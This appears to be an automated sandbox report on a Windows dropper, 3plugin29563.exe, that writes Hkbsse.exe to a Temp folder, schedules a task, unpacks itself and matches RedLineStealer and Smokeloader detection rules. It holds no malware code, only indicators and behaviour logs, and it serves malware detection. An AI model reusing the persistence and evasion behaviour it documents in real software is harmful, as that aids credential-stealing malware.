Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_007371E0	21_2_007371E0
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00711809	21_2_00711809
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00737932	21_2_00737932
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00737A52	21_2_00737A52
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00713FF8	21_2_00713FF8
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_007B80EF	21_2_007B80EF

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 0212DB49 appears 68 times
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 0041DF20 appears 43 times
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 0212E187 appears 38 times
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 0041D8E2 appears 77 times
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 00418060 appears 129 times
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: String function: 021282C7 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0041D5F0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0070D857 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 004179A0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0041DF20 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 007082C7 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0070E187 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0041D605 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0041D8E2 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 00418060 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: String function: 0070DB49 appears 68 times

Source: C:\Users\user\Desktop\3plugin29563.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 728

Source: 3plugin29563.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 3plugin29563.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Hkbsse.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/68@0/3

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00784506 CreateToolhelp32Snapshot,Module32First,

0_2_00784506

Source: C:\Users\user\Desktop\3plugin29563.exe

0_2_0040A879

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\5ebdeb3f981e7577724a336321b324eb
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3476
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7108

Source: C:\Users\user\Desktop\3plugin29563.exe

File created: C:\Users\user\AppData\Local\Temp\239f17af5a

Jump to behavior

Source: 3plugin29563.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\3plugin29563.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3plugin29563.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\3plugin29563.exe

File read: C:\Users\user\Desktop\3plugin29563.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3plugin29563.exe "C:\Users\user\Desktop\3plugin29563.exe"
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 728
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 808
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 760
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 884
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1028
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1092
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1136
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe"
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1184
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 560
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 568
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 580
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 772
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780
Source: C:\Users\user\Desktop\3plugin29563.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900	Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\3plugin29563.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3plugin29563.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\3plugin29563.exe	Unpacked PE file: 0.2.3plugin29563.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Unpacked PE file: 21.2.Hkbsse.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\3plugin29563.exe	Unpacked PE file: 0.2.3plugin29563.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Unpacked PE file: 21.2.Hkbsse.exe.400000.0.unpack

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0042BF39 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042BF39

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004106E3 push ds; iretd	0_2_004106E4
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004106A1 pushad ; iretd	0_2_004106A2
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041D8BC push ecx; ret	0_2_0041D8CF
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041DF66 push ecx; ret	0_2_0041DF79
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_007830AD push eax; retf 007Fh	0_2_007832FD
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_007885E9 pushad ; iretd	0_2_007885F0
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00789B98 push es; retf	0_2_00789BB9
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0212DB23 push ecx; ret	0_2_0212DB36
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02120908 pushad ; iretd	0_2_02120909
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0212094A push ds; iretd	0_2_0212094B
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004523CC pushad ; retf 0042h	21_2_004523CD
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041D8BC push ecx; ret	21_2_0041D8CF
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041DF66 push ecx; ret	21_2_0041DF79
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00451F3C pushad ; retf 0042h	21_2_00451F3D
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0070094A push ds; iretd	21_2_0070094B
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00700908 pushad ; iretd	21_2_00700909
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0070DB23 push ecx; ret	21_2_0070DB36
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00788851 pushad ; iretd	21_2_00788858

Source: 3plugin29563.exe	Static PE information: section name: .text entropy: 7.233134172061625
Source: Hkbsse.exe.0.dr	Static PE information: section name: .text entropy: 7.233134172061625

Source: C:\Users\user\Desktop\3plugin29563.exe

File created: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Jump to dropped file

Source: C:\Users\user\Desktop\3plugin29563.exe

File created: C:\Windows\Tasks\Hkbsse.job

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0041C708 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041C708

Source: C:\Users\user\Desktop\3plugin29563.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
